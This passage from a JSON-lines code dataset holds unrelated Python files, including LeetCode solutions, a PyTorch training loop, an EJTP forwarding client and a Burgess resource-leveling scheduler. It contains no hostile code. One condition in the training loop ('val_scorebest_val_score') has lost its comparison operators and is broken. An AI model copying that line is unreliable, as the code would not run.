stream.getvalue()\n","repo_name":"physimals/quantiphyse","sub_path":"quantiphyse/data/extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"48"} +{"seq_id":"16556504562","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def mergeTrees(self, root1, root2):\n \"\"\"\n :type root1: TreeNode\n :type root2: TreeNode\n :rtype: TreeNode\n \"\"\"\n \n def dfs(node1, node2): # node1로 병합\n if node1 and node2:\n node1.val += node2.val\n node1.left = dfs(node1.left, node2.left)\n node1.right = dfs(node1.right, node2.right)\n return node1\n \n elif not node1 and node2:\n return node2\n else:\n return node1\n \n return dfs(root1, root2) # 173ms(7.83%) / 14,8mb(21.11%)","repo_name":"junhong625/MOCOCO","sub_path":"[9주차] 트리/[LeetCode 617번] Merge Two Binary Tress/이정규_나도roo1로병합.py","file_name":"이정규_나도roo1로병합.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"29975817180","text":"#!/usr/bin/env python3\n# RyanWaltersDev Jun 7 2021 -- integers as user inputs\n\n# Return age as a string\n'''\nage = input(\"How old are you? \")\nprint(age)\n'''\n\n# Purposeful error, string cannot compare to int\n'''\nage = input(\"How old are you? \")\nif age >= 18:\n print(\"You are old enough to vote!\")\n'''\n\n# Fix error by int(function)\nage = input(\"How old are you? \")\nage = int(age)\nif age >= 18:\n print(\"You are old enough to vote!\")\nelse:\n print(\"Sorry, you are not old enough to vote.\")\n\n# END OF PROGRAM\n","repo_name":"RyanWaltersDev/NSPython_Chapter7","sub_path":"age.py","file_name":"age.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4984939626","text":"walking_minutes = int(input())\nwalks_per_day = int(input())\ncalories_intake = int(input())\n\ncalories_burned = (walking_minutes * walks_per_day) * 5\n\nif calories_burned >= calories_intake / 2:\n print(f\"Yes, the walk for your cat is enough. Burned calories per day: {calories_burned}.\")\nelse:\n print(f\"No, the walk for your cat is not enough. Burned calories per day: {calories_burned}.\")\n","repo_name":"AlexMitev91/py-basics-22","sub_path":"Exam_prep/cat_walking.py","file_name":"cat_walking.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24718362822","text":"import os\nimport random\nimport numpy as np \nimport pickle\nimport torch\nimport torch.nn as nn\nimport torch.utils.data as utils_data\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix, roc_curve, auc, roc_auc_score\nimport torch.nn.functional as F\nimport logging\nimport math\nfrom time import time\nfrom sklearn import metrics\nimport pandas as pd\nimport matplotlib\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom debugging_utils import *\nimport kpis\nimport models_functions as mf\nfont = {'size' : 22}\nmatplotlib.rcParams['figure.figsize'] = (18, 12)\nmatplotlib.rc('font', **font)\n\n\ndef eval_top_func(p, model_eval_func, model_kpi_func, model, loss_func_tuple, te_dataset, device, tensorboard = None):\n model = model.to(device)\n \n te_loader = utils_data.DataLoader(dataset = te_dataset, shuffle = True, batch_size = p.BATCH_SIZE, drop_last= True, pin_memory= True, num_workers= 12)\n\n vis_data_path = p.VIS_DIR + p.experiment_tag + '.pickle'\n best_model_path = p.MODELS_DIR + p.experiment_tag + '.pt'\n figure_name = p.experiment_tag\n \n if p.SELECTED_MODEL != 'CONSTANT_PARAMETER':\n model.load_state_dict(torch.load(best_model_path))\n \n print_dict, kpi_dict = eval_model(p, tensorboard, model_eval_func, model_kpi_func, model, loss_func_tuple, te_loader, te_dataset, ' N/A', device, eval_type = 'Test', vis_data_path = vis_data_path, figure_name=figure_name)\n \n print('Test Losses:\\n'+ ''.join(['{}:{}\\n'.format(k, print_dict[k]) for k in print_dict]))\n for k in kpi_dict:\n if 'histogram' not in k:\n print(''.join('{}:{}'.format(k,kpi_dict[k])))\n\n \n return kpi_dict\n\n\ndef train_top_func(p, model_train_func, model_eval_func, model_kpi_func, model,loss_func_tuple, optimizer , tr_dataset, val_dataset, device, tensorboard = None):\n \n \n tr_loader = utils_data.DataLoader(dataset = tr_dataset, shuffle = True, batch_size = p.BATCH_SIZE, drop_last= True, pin_memory= True, num_workers= 12)\n val_loader = utils_data.DataLoader(dataset = val_dataset, shuffle = True, batch_size = p.BATCH_SIZE, drop_last= True, pin_memory= True, num_workers= 12)\n \n scheduler = optim.lr_scheduler.StepLR(optimizer, 1, 1)\n \n best_model_path = p.MODELS_DIR + p.experiment_tag + '.pt'\n\n if p.LOWER_BETTER_VAL_SCORE:\n best_val_score = float(\"inf\")\n else:\n best_val_score = 0\n\n patience = p.PATIENCE\n best_epoch = 0\n p.LR_WU_CURRENT_BATCH = 0\n for epoch in range(p.NUM_EPOCHS):\n print(\"===================== Epoch:{} =====================\".format(epoch))\n start = time()\n tr_print_dict = train_model(p, tensorboard, model_train_func, model, loss_func_tuple, optimizer, scheduler, tr_loader, epoch+1, device)\n \n \n if epoch>p.SKIP_VAL_EPOCHS or p.DEBUG_MODE == True:\n val_start = time()\n val_print_dict, val_kpi_dict = eval_model(p, tensorboard, model_eval_func, model_kpi_func, model, loss_func_tuple, val_loader, val_dataset, epoch+1, device, eval_type = 'Validation')\n if p.VAL_SCORE in val_print_dict:\n val_score = val_print_dict[p.VAL_SCORE]\n else:\n val_score = val_kpi_dict[p.VAL_SCORE]\n val_end = time()\n #print(\"Validation Accuracy:\",val_acc,' Avg Pred Time: ', val_avg_pred_time, \" Avg Loss: \", val_loss,\" at Epoch\", epoch+1)\n #if tensorboard != None: \n #if tensorboard != None: \n #if tensorboard != None: \n #tensorboard.add_scalar('tr_total_loss', tr_loss, epoch+1) \n #tensorboard.add_scalar('tr_total_loss', tr_loss, epoch+1) \n #tensorboard.add_scalar('tr_total_loss', tr_loss, epoch+1) \n \n if (p.LOWER_BETTER_VAL_SCORE and val_scorebest_val_score):\n best_val_score = val_score\n best_epoch = epoch\n torch.save(model.state_dict(), best_model_path)\n patience = p.PATIENCE\n else:\n patience -= 1\n end = time()\n tr_print_dict['Total Time'] = end-start\n tr_print_dict['Epoch'] = epoch \n\n val_print_dict['Validation Time'] = val_end-val_start\n val_print_dict['Best Epoch'] = best_epoch\n val_print_dict['Best Val Score ({})'.format(p.VAL_SCORE)] = best_val_score\n \n print('Training Metrics:\\n'+ ''.join(['{}:{}\\n'.format(k,tr_print_dict[k]) for k in tr_print_dict]))\n print('Validation Metrics:\\n'+ ''.join(['{}:{}\\n'.format(k,val_print_dict[k]) for k in val_print_dict]))\n \n for k in tr_print_dict:\n tensorboard.add_scalar('Train_epoch_' + k, tr_print_dict[k], epoch)\n for k in val_print_dict:\n tensorboard.add_scalar('Validation_epoch_' + k, val_print_dict[k], epoch)\n \n print('Validation KPIs:\\n')\n for k in val_kpi_dict:\n \n if 'histogram' not in k:\n print(''.join('{}:{}'.format(k,val_kpi_dict[k])))\n \n if 'histogram' in k:\n tensorboard.add_histogram('Validation_epoch_' + k, val_kpi_dict[k], epoch)\n continue\n elif ('group' not in k) and ('min' not in k) and('mnll' not in k) :\n tensorboard.add_scalar('Validation_epoch_' + k, val_kpi_dict[k], epoch)\n if p.DEBUG_MODE == True:\n print('Debugging Mode Active.')\n break\n\n if patience == 0:\n print(' No performance improvement in Validation data after:', epoch+1, 'Epochs!')\n break\n else:\n end = time()\n tr_print_dict['Total Time'] = end-start\n tr_print_dict['Epoch'] = epoch \n \n print('Training Metrics:\\n'+ ''.join(['{}:{}\\n'.format(k,tr_print_dict[k]) for k in tr_print_dict]))\n \n for k in tr_print_dict:\n tensorboard.add_scalar('Train_epoch_' + k, tr_print_dict[k], epoch)\n \n \n \n \n \n\n result_dic = {\n 'EarlyStopping Epoch': best_epoch + 1,\n 'Best Validation Loss': best_val_score,\n }\n return result_dic\n\n\ndef train_model(p, tb, model_train_func, model, loss_func_tuple, optimizer, scheduler, train_loader, epoch, device, vis_step = 20):\n # Number of samples with correct classification\n # total size of train data\n # number of batch\n model_time = 0\n\n all_start = time()\n model.train()\n vis_print_dict = []\n print_dict = []\n # Training loop over batches of data on train dataset\n for batch_idx, (data_tuple, labels,_, _) in enumerate(train_loader):\n \n if p.DEBUG_MODE == True:\n if batch_idx >50: ##Uncoment for debuggering\n break\n \n data_tuple = [data.to(device) for data in data_tuple]\n label_tuple = (labels.to(device),)\n \n # 1. Clearing previous gradient values.\n optimizer.zero_grad()\n \n # 2. Run the Model \n #print(model_train_func)\n loss, batch_print_info_dict = model_train_func(p, data_tuple, label_tuple, model, loss_func_tuple, device)\n\n # 3. Calculating new grdients given the loss value\n loss.backward()\n\n # 4. Updating the weights\n if p.LR_WU and p.LR_WU_CURRENT_BATCH<=p.LR_WU_BATCHES:\n p.LR_WU_CURRENT_BATCH +=1\n lr = p.LR*p.LR_WU_CURRENT_BATCH/p.LR_WU_BATCHES\n for g in optimizer.param_groups:\n g['lr'] = lr\n else:\n p.LR_WU_CURRENT_BATCH +=1\n lr = p.LR/math.sqrt(p.LR_WU_CURRENT_BATCH+1)\n for g in optimizer.param_groups:\n g['lr'] = lr\n\n optimizer.step()\n # For epoch level printing\n if batch_idx == 0:\n print_dict = batch_print_info_dict\n else:\n for k in print_dict:\n print_dict[k] += batch_print_info_dict[k]/len(train_loader)\n \n # Every X batch print vis_print_dict\n if batch_idx % 500 == 0:\n if batch_idx !=0:\n print('Training Epoch: {}, Batch: {}/{}\\n'.format(epoch, batch_idx, len(train_loader))+ ''.join(['{}:{}\\n'.format(k,vis_print_dict[k]) for k in vis_print_dict]))\n for k in vis_print_dict:\n tb.add_scalar(k, vis_print_dict[k], epoch*(int(len(train_loader)/500)) + int(batch_idx/500))\n vis_print_dict = batch_print_info_dict\n else:\n for k in vis_print_dict:\n vis_print_dict[k] += batch_print_info_dict[k]/500\n \n all_end = time()\n all_time = all_end - all_start\n \n \n \n return print_dict\n \ndef eval_model(p, tb, model_eval_func, model_kpi_func, model, loss_func_tuple, test_loader, test_dataset, epoch, device, eval_type = 'Validation', vis_data_path = None, figure_name = None):\n total = len(test_loader.dataset)\n #print('Total test data',total)\n #exit()\n num_batch = int(np.floor(total/model.batch_size))\n # Initialise Variables\n \n plot_dicts = []\n print_dict = {}\n kpi_input_dict = {}\n #model.eval()\n for batch_idx, (data_tuple, labels, plot_info, _) in enumerate(test_loader):\n if p.DEBUG_MODE == True:\n if batch_idx >2: \n break\n \n \n data_tuple = [data.to(device) for data in data_tuple]\n label_tuple = (labels.to(device),)\n with torch.no_grad():\n batch_print_info_dict, batch_kpi_input_dict = model_eval_func(p, data_tuple, plot_info, test_dataset, label_tuple, model, loss_func_tuple, device, eval_type)\n\n \n if batch_idx == 0:\n for k in batch_kpi_input_dict:\n kpi_input_dict[k] = [batch_kpi_input_dict[k]]\n for k in batch_print_info_dict:\n print_dict[k] = batch_print_info_dict[k]\n else:\n for k in batch_kpi_input_dict:\n kpi_input_dict[k].append(batch_kpi_input_dict[k])\n \n for k in batch_print_info_dict:\n print_dict[k] += batch_print_info_dict[k]/len(test_loader)\n \n if (batch_idx+1) % 500 == 0:\n print('Epoch: ',epoch, ' Batch: ', batch_idx+1, '/{}'.format(len(test_loader)))\n \n kpi_dict = model_kpi_func(p, kpi_input_dict, test_dataset.output_states_min, test_dataset.output_states_max, figure_name)\n if eval_type == 'Test':\n with open(vis_data_path, \"wb\") as fp:\n pickle.dump(kpi_input_dict, fp)\n \n return print_dict, kpi_dict\n\n\n \n\n\n\n","repo_name":"SajjadMzf/TrajPred","sub_path":"training_functions.py","file_name":"training_functions.py","file_ext":"py","file_size_in_byte":10797,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"4913808101","text":"from typing import List\n\n\nclass Solution:\n def largestDivisibleSubset(self, nums: List[int]) -> List[int]:\n nums.sort()\n\n dp = dict()\n dp[nums[0]] = [nums[0]]\n global_max = [nums[0]]\n\n for i in range(1, len(nums)):\n maxi = []\n for j in range(0, i):\n if nums[i] % nums[j] == 0:\n if len(dp[nums[j]]) > len(maxi):\n maxi = dp[nums[j]].copy()\n maxi.append(nums[i])\n dp[nums[i]] = maxi\n if len(maxi) > len(global_max):\n global_max = maxi\n\n return global_max","repo_name":"fzdy1914/leetcode","sub_path":"dynamic-programming/368-largest-divisible-subset.py","file_name":"368-largest-divisible-subset.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72213561426","text":"'''\nThis file is part of the Python EJTP library.\n\nThe Python EJTP library is free software: you can redistribute it \nand/or modify it under the terms of the GNU Lesser Public License as\npublished by the Free Software Foundation, either version 3 of the \nLicense, or (at your option) any later version.\n\nthe Python EJTP library is distributed in the hope that it will be \nuseful, but WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Lesser Public License for more details.\n\nYou should have received a copy of the GNU Lesser Public License\nalong with the Python EJTP library. If not, see \n.\n'''\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom persei import RawData\n\nfrom ejtp.client import Client\nfrom ejtp import frame\nfrom ejtp.util.hasher import make as hashfunc\n\nclass ForwardClient(Client):\n def __init__(self, router, interface, serveraddr, **kwargs):\n '''\n Client side for EJForward protocol. Takes server address as constructor arg.\n '''\n Client.__init__(self, router, interface, **kwargs)\n self.serveraddr = serveraddr\n self._status = {}\n self._status_callbacks = []\n\n def rcv_callback(self, msg, client_obj):\n data = msg.unpack()\n mtype = data['type']\n if mtype=='ejforward-notify':\n self._status = data\n for callback in self._status_callbacks:\n callback(self)\n self._status_callbacks = []\n elif mtype=='ejforward-message':\n internal = RawData(data['data'])\n self.ack([hashfunc(internal)])\n try:\n self.send(frame.createFrame(internal)) # forward to router\n except ValueError:\n logger.warning(\"Invalid frame, discarding\")\n else:\n logger.warning(\"Unknown message type, %r\" % mtype)\n\n def ack(self, hashes):\n self.upload(\n 'ejforward-ack',\n {\n 'hashes': list(hashes),\n },\n )\n\n def retrieve(self, hashes=None):\n '''\n Get the current status according to the server.\n '''\n self.upload(\n 'ejforward-retrieve',\n {\n 'hashes': list(hashes),\n },\n )\n\n def get_status(self, callback=None):\n '''\n Get the current status according to the server.\n '''\n if callback:\n self._status_callbacks.append(callback)\n self.upload(\n 'ejforward-get-status',\n {},\n )\n\n def upload(self, dtype, data):\n '''\n Send a message to the server.\n '''\n data['type'] = dtype\n self.write_json(self.serveraddr, data)\n\n @property\n def status(self):\n return self._status\n","repo_name":"campadrenalin/EJTP-lib-python","sub_path":"ejtp/applications/ejforward/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"48"} +{"seq_id":"71695839507","text":"import osm2graph\nimport pickle\n\ndef main():\n coords = osm2graph.get_coords_by_id()\n compr = osm2graph.compress_coords(coords)\n ways = osm2graph.get_ways(coords)\n pickle.dump(coords, open('coord.dump', 'wb'))\n pickle.dump(compr, open('compr.dump', 'wb'))\n pickle.dump(ways, open('ways.dump', 'wb'))\n\nmain()\n","repo_name":"dimazilla123/moscow-road-remove","sub_path":"coord_dump.py","file_name":"coord_dump.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31498531952","text":"\n\n\n\n\n\n# Here we get an int input from the user\nnum = int(input(\"Pick a number: \"))\n\n# Here we just made a vribaile that spits out what the octal number od the decimal number of the picked number is \nfinal_words = 'The octal number of decimal number: '\n\n# Here we're is printing what needs to be done\nprint(final_words, '%o' % num)\n","repo_name":"MoeTheBeast/Programming-journal","sub_path":"Input_Output_Exercises/Ex3.py","file_name":"Ex3.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26542067075","text":"import itertools\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--train\", type=str, help=\"add the path to the csv for the training data subset\", required=True)\nargs = parser.parse_args()\n\ntrain = pd.read_csv(args.train)\n\n# dictionary where we will track sentences and their duplicates\nduplicates = {}\n\n# loop through every unique sentence in the training set\nfor sentence in train['sentence'].unique():\n\n # get the indices of the rows where this sentence occurs\n indices = train.index[train['sentence'] == sentence].tolist()\n\n # add the sentence and its corresponding indices to the dictionary\n duplicates[sentence] = indices\n\n# we create the experiment training sets with the repeated instances of each item \none2one = []\none2two = []\none2four = []\none2eight = []\n\nfor dups in duplicates.values():\n one2one.append(dups[0:1])\n one2two.append(dups[0:2])\n one2four.append(dups[0:4])\n one2eight.append(dups[0:8])\n\none2one = [item for sublist in one2one for item in sublist]\none2two = [item for sublist in one2two for item in sublist]\none2four = [item for sublist in one2four for item in sublist]\none2eight = [item for sublist in one2eight for item in sublist]\n\n# save csv files of our experiment training sets\ntrain.iloc[one2one].to_csv('experiment_data/one2one_train.csv', index=True)\ntrain.iloc[one2two].to_csv('experiment_data/one2two_train.csv', index=True)\ntrain.iloc[one2four].to_csv('experiment_data/one2four_train.csv', index=True)\ntrain.iloc[one2eight].to_csv('experiment_data/one2eight_train.csv', index=True)\n","repo_name":"Witty-Kitty/common_voice_prep","sub_path":"preparation_scripts/experiment0_prep.py","file_name":"experiment0_prep.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31552353469","text":"import itertools\nimport numpy as np\n\nfrom cpm import *\n\n\nclass BurgessProcedure:\n\n\tdef __init__(self, node_matrix=[]):\n\t\tself.node_matrix = node_matrix\n\t\tself.critical_activities = [] #List Or Array#\n\t\tself.critical_activities_length = 0\n\t\tself.nonCritical_activities = {}\n\t\tself.delay_activity_resluts = {}\n\t\tself.delay_activity_r = {}\n\t\tself.delay_activity_r2 = {} #Dictionary Or Map#\n\t\tself.project_duration = 0\n\t\tself.nonCritical_activities_length = 0\n\t\tself.optimal_time_resource_matrix = None\n\t\tself.optimal_total_R = int(1e9)\n\t\tself.optimal_total_R_square = int(1e9)\n\t\t# print('- Node_Matrix -\\n', self.node_matrix)\n\t\n\n\tdef print_burgess_schedule_details(self):\n\t\tprint(\"---------------------------------\")\n\t\tprint(\"---------------------------------\")\n\t\tprint(\"---------------------------------\")\n\t\tprint(\"Optimal Result\", self.optimal_total_R_square)\n\t\tprint(\"---------------------------------\")\n\t\tprint(\"Name\\tOS\\tOF\\tShift \\tR^2 \\tSUM(R)\\tSUM(R^2)\")\n\t\tfor node in self.node_matrix:\n\t\t\tif node[\"critical\"] == True:\n\t\t\t\tprint(node[\"name\"], \"\\t\", node[\"OS\"], \"\\t\", node[\"OF\"], \"\\t\", int(node[\"OS\"])-int(node[\"ES\"]))\n\t\t\telse:\n\t\t\t\tprint(node[\"name\"], \"\\t\", node[\"OS\"], \"\\t\", node[\"OF\"], \"\\t\", int(node[\"OS\"])-int(node[\"ES\"]),\"\\t\",\n\t\t\t\tself.delay_activity_resluts[node[\"name\"]], \"\\t\", self.delay_activity_r[node[\"name\"]], \"\\t\", self.delay_activity_r2[node[\"name\"]])\n\n\n\tdef initialize_OS_OF(self):\n\t\tfor node in self.node_matrix:\n\t\t\tnode[\"OS\"] = node[\"ES\"] \n\t\t\tnode[\"OF\"] = node[\"EF\"]\n\n\n\tdef separate_critical_activities(self):\n\t\tfor node in self.node_matrix:\n\t\t\tif node[\"critical\"] == True:\n\t\t\t\tself.project_duration += int(node[\"duration\"])\n\t\t\t\tself.critical_activities.append(node)\n\n\n\tdef generate_time_resource_matrix(self):\n\t\tallotted_resources_for_cp = np.zeros(self.project_duration + 1, dtype=int)\n\n\t\tfor ca in self.critical_activities:\n\t\t\tfor ind, value in enumerate(allotted_resources_for_cp):\n\t\t\t\tif ind > int(ca[\"ES\"]) and ind <= int(ca[\"EF\"]):\n\t\t\t\t\tallotted_resources_for_cp[ind] = value + int(ca[\"resource\"]) \n\t\t# allotted_resources_for_cp.shape = (1, self.project_duration + 1)\n\t\n\t\t# flexible_resource_allocation_matrix = np.zeros((1, self.project_duration + 1), dtype=int)\n\t\t\n\t\t# time_resource_matrix = np.concatenate((allotted_resources_for_cp, flexible_resource_allocation_matrix))\n\t\t# print(time_resource_matrix)\n\t\treturn allotted_resources_for_cp\n\n\tdef calculate_total_resources(self, node, allotted_resources_for_cp):\n\t\tallotted_resources = np.copy(allotted_resources_for_cp)\n\t\tfor a in self.node_matrix:\n\t\t\tif a[\"critical\"] == False and a[\"name\"] != node[\"name\"]:\n\t\t\t\tfor ind, value in enumerate(allotted_resources):\n\t\t\t\t\tif ind > int(a[\"OS\"]) and ind <= int(a[\"OF\"]):\n\t\t\t\t\t\tallotted_resources[ind] = value + int(a[\"resource\"]) \n\t\treturn allotted_resources\n\n\tdef is_all_node_moved(self):\n\t\tmoved = True\n\t\tfor node in self.node_matrix:\n\t\t\tif node[\"critical\"] == False:\n\t\t\t\tif int(node[\"ES\"]) == int(node[\"OS\"]):\n\t\t\t\t\tmoved = False\n\t\treturn moved\n\n\tdef burgess_scheduler1(self, allotted_resources_for_cp):\n\t\tsorted_node_matrix = sorted(self.node_matrix, key = lambda i: int(i['ES']), reverse=True)\n\t\twhile True:\n\t\t\tmin_sum = int(1e9)\n\t\t\tfor node in sorted_node_matrix:\n\t\t\t\tif node[\"critical\"] == False:\n\t\t\t\t\t# print(\"node\", node, \"\\n\")\n\t\t\t\t\tdes_os = int(1e9)\n\t\t\t\t\tdes_nodes = node[\"descendant\"]\n\t\t\t\t\tfor desN in des_nodes:\n\t\t\t\t\t\tdes_node = list(filter(lambda key: key['name'] == desN, self.node_matrix))\n\t\t\t\t\t\t# print(des_node, \"\\n\")\n\t\t\t\t\t\tif des_node[0]['OS'] < des_os:\n\t\t\t\t\t\t\tdes_os = des_node[0]['OS']\n\t\t\t\t\t\t\t# print(des_os, \"\\n\")\n\n\t\t\t\t\tallotted_resources = self.calculate_total_resources(node, allotted_resources_for_cp)\n\t\t\t\t\t# print(allotted_resources)\n\t\t\t\t\tself.delay_activity_resluts[node[\"name\"]] = int(1e9)\n\t\t\t\t\tfor i in range(1, node[\"slack\"]+1):\n\t\t\t\t\t\tif(int(node[\"EF\"])+i > des_os):\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\ttemp_alloted_resource = np.copy(allotted_resources)\n\t\t\t\t\t\tsum = 0\n\t\t\t\t\t\tfor ind, value in enumerate(temp_alloted_resource):\n\t\t\t\t\t\t\tif ind > int(node[\"ES\"])+i and ind <= int(node[\"EF\"])+i:\n\t\t\t\t\t\t\t\ttemp_alloted_resource[ind] = value + int(node[\"resource\"])\n\n\t\t\t\t\t\tsquare_resources = [r*r for r in temp_alloted_resource]\n\t\t\t\t\t\tsum = np.sum(square_resources)\n\t\t\t\t\t\t# print(\"Hi\", node['name'], i, \"\\n\")\n\t\t\t\t\t\t# print(self.delay_activity_resluts[node[\"name\"]], sum, \"\\n\")\n\t\t\t\t\t\tif sum < self.delay_activity_resluts[node[\"name\"]]:\n\t\t\t\t\t\t\tself.delay_activity_resluts[node[\"name\"]] = sum\n\t\t\t\t\t\t\tself.delay_activity_r[node[\"name\"]] = temp_alloted_resource\n\t\t\t\t\t\t\tself.delay_activity_r2[node[\"name\"]] = square_resources\n\t\t\t\t\t\t\tnode[\"OS\"] = int(node[\"ES\"]) + i \n\t\t\t\t\t\t\tnode[\"OF\"] = int(node[\"EF\"]) + i\n\t\t\t\t\tif self.delay_activity_resluts[node[\"name\"]] < min_sum and self.is_all_node_moved():\n\t\t\t\t\t\tmin_sum = self.delay_activity_resluts[node[\"name\"]]\n\t\t\tif min_sum < self.optimal_total_R_square:\n\t\t\t\tself.optimal_total_R_square = min_sum\n\t\t\telse:\n\t\t\t\tbreak \n\n\tdef burgess_scheduler2(self, allotted_resources_for_cp):\n\t\tsorted_node_matrix = sorted(self.node_matrix, key = lambda i: int(i['ES']), reverse=True)\n\t\twhile True:\n\t\t\tmin_sum = int(1e9)\n\t\t\tfor node in sorted_node_matrix:\n\t\t\t\tif node[\"critical\"] == False:\n\t\t\t\t\t# print(\"node\", node, \"\\n\")\n\t\t\t\t\tdes_os = int(1e9)\n\t\t\t\t\tdes_nodes = node[\"descendant\"]\n\t\t\t\t\tfor desN in des_nodes:\n\t\t\t\t\t\tdes_node = list(filter(lambda key: key['name'] == desN, self.node_matrix))\n\t\t\t\t\t\t# print(des_node, \"\\n\")\n\t\t\t\t\t\tif des_node[0]['OS'] < des_os:\n\t\t\t\t\t\t\tdes_os = des_node[0]['OS']\n\t\t\t\t\t\t\t# print(des_os, \"\\n\")\n\n\t\t\t\t\tallotted_resources = self.calculate_total_resources(node, allotted_resources_for_cp)\n\t\t\t\t\t# print(allotted_resources)\n\t\t\t\t\tself.delay_activity_resluts[node[\"name\"]] = int(1e9)\n\t\t\t\t\tfor i in range(0, node[\"slack\"]+1):\n\t\t\t\t\t\tif(int(node[\"EF\"])+i > des_os):\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\ttemp_alloted_resource = np.copy(allotted_resources)\n\t\t\t\t\t\tsum = 0\n\t\t\t\t\t\tfor ind, value in enumerate(temp_alloted_resource):\n\t\t\t\t\t\t\tif ind > int(node[\"ES\"])+i and ind <= int(node[\"EF\"])+i:\n\t\t\t\t\t\t\t\ttemp_alloted_resource[ind] = value + int(node[\"resource\"])\n\n\t\t\t\t\t\tsquare_resources = [r*r for r in temp_alloted_resource]\n\t\t\t\t\t\tsum = np.sum(square_resources)\n\t\t\t\t\t\t# print(\"Hi\", node['name'], i, \"\\n\")\n\t\t\t\t\t\t# print(self.delay_activity_resluts[node[\"name\"]], sum, \"\\n\")\n\t\t\t\t\t\tif sum < self.delay_activity_resluts[node[\"name\"]]:\n\t\t\t\t\t\t\tself.delay_activity_resluts[node[\"name\"]] = sum\n\t\t\t\t\t\t\tself.delay_activity_r[node[\"name\"]] = temp_alloted_resource\n\t\t\t\t\t\t\tself.delay_activity_r2[node[\"name\"]] = square_resources\n\t\t\t\t\t\t\tnode[\"OS\"] = int(node[\"ES\"]) + i \n\t\t\t\t\t\t\tnode[\"OF\"] = int(node[\"EF\"]) + i\n\t\t\t\t\tif self.delay_activity_resluts[node[\"name\"]] < min_sum:\n\t\t\t\t\t\tmin_sum = self.delay_activity_resluts[node[\"name\"]]\n\t\t\t# print(\"Min Sum\", min_sum) \n\t\t\t# self.print_burgess_schedule_details()\n\t\t\tif min_sum < self.optimal_total_R_square:\n\t\t\t\tself.optimal_total_R_square = min_sum\n\t\t\telse:\n\t\t\t\tbreak \n\n\n\tdef prepare_burgess_response(self):\n\t\tR_by_time = None\n\t\tR2_by_time = None\n\t\ttotal_R = 0\n\t\ttotal_R2 = int(self.optimal_total_R_square)\n\t\tnode_matrix = self.node_matrix\n\n\t\tnode_matrix = []\n\t\tfor i, node in enumerate(self.node_matrix):\n\t\t\tsingle_node = {}\n\t\t\tsingle_node[\"ES\"] = node[\"ES\"]\n\t\t\tsingle_node[\"OS\"] = node[\"OS\"]\n\t\t\tsingle_node[\"OF\"] = node[\"OF\"]\n\t\t\tsingle_node[\"LF\"] = node[\"LF\"]\n\t\t\tsingle_node[\"name\"] = node[\"name\"]\n\t\t\tsingle_node[\"resource\"] = node[\"resource\"]\n\t\t\tnode_matrix.append(single_node)\n\n\t\tfor node in self.node_matrix:\n\t\t\tif node[\"critical\"] == False: \n\t\t\t\tR_by_time = np.array(self.delay_activity_r[node[\"name\"]], dtype=int)\n\t\t\t\tR2_by_time = np.array(self.delay_activity_r2[node[\"name\"]], dtype=int)\n\t\t\t\ttotal_R = np.sum(R_by_time)\n\t\t\t\tbreak\n\t\t# R_by_time = R_by_time.astype('int')\n\t\treturn {\"node_matrix\": node_matrix, \"R_by_time\": R_by_time.tolist(), \"R2_by_time\": R2_by_time.tolist(), \n\t\t\t\"optimal_total_R\": int(total_R), \"optimal_total_R_square\": int(total_R2)}\n\n\n\tdef estimate_optimal_schedule_burgess1(self):\n\t\tself.initialize_OS_OF()\n\t\tself.separate_critical_activities()\n\t\tallotted_resources_for_cp = self.generate_time_resource_matrix()\n\t\tself.burgess_scheduler1(allotted_resources_for_cp)\n\t\tself.print_burgess_schedule_details()\n\t\t# print(self.prepare_burgess_response())\n\t\treturn self.prepare_burgess_response()\n\n\tdef estimate_optimal_schedule_burgess2(self):\n\t\tself.initialize_OS_OF()\n\t\tself.separate_critical_activities()\n\t\tallotted_resources_for_cp = self.generate_time_resource_matrix()\n\t\tself.burgess_scheduler2(allotted_resources_for_cp)\n\t\tself.print_burgess_schedule_details()\n\t\t\n\t\treturn self.prepare_burgess_response()\n\t\t\n\t\t","repo_name":"antanvir/project-resource-leveling","sub_path":"burgess_procedure.py","file_name":"burgess_procedure.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"28199741993","text":"import frappe\nfrom frappe import _, unscrub\nfrom frappe.utils import get_link_to_form, today, add_days, cint, format_date\n\nfrom frappe.core.doctype.communication.email import _make as make_communication\nfrom six import iteritems\n\ndef create_sales_invoice(self):\n try:\n si_doc = frappe.new_doc(\"Sales Invoice\")\n si_doc.customer = frappe.get_value(\"Gym Member\", self.gym_member, \"customer\")\n si_doc.posting_date = today()\n 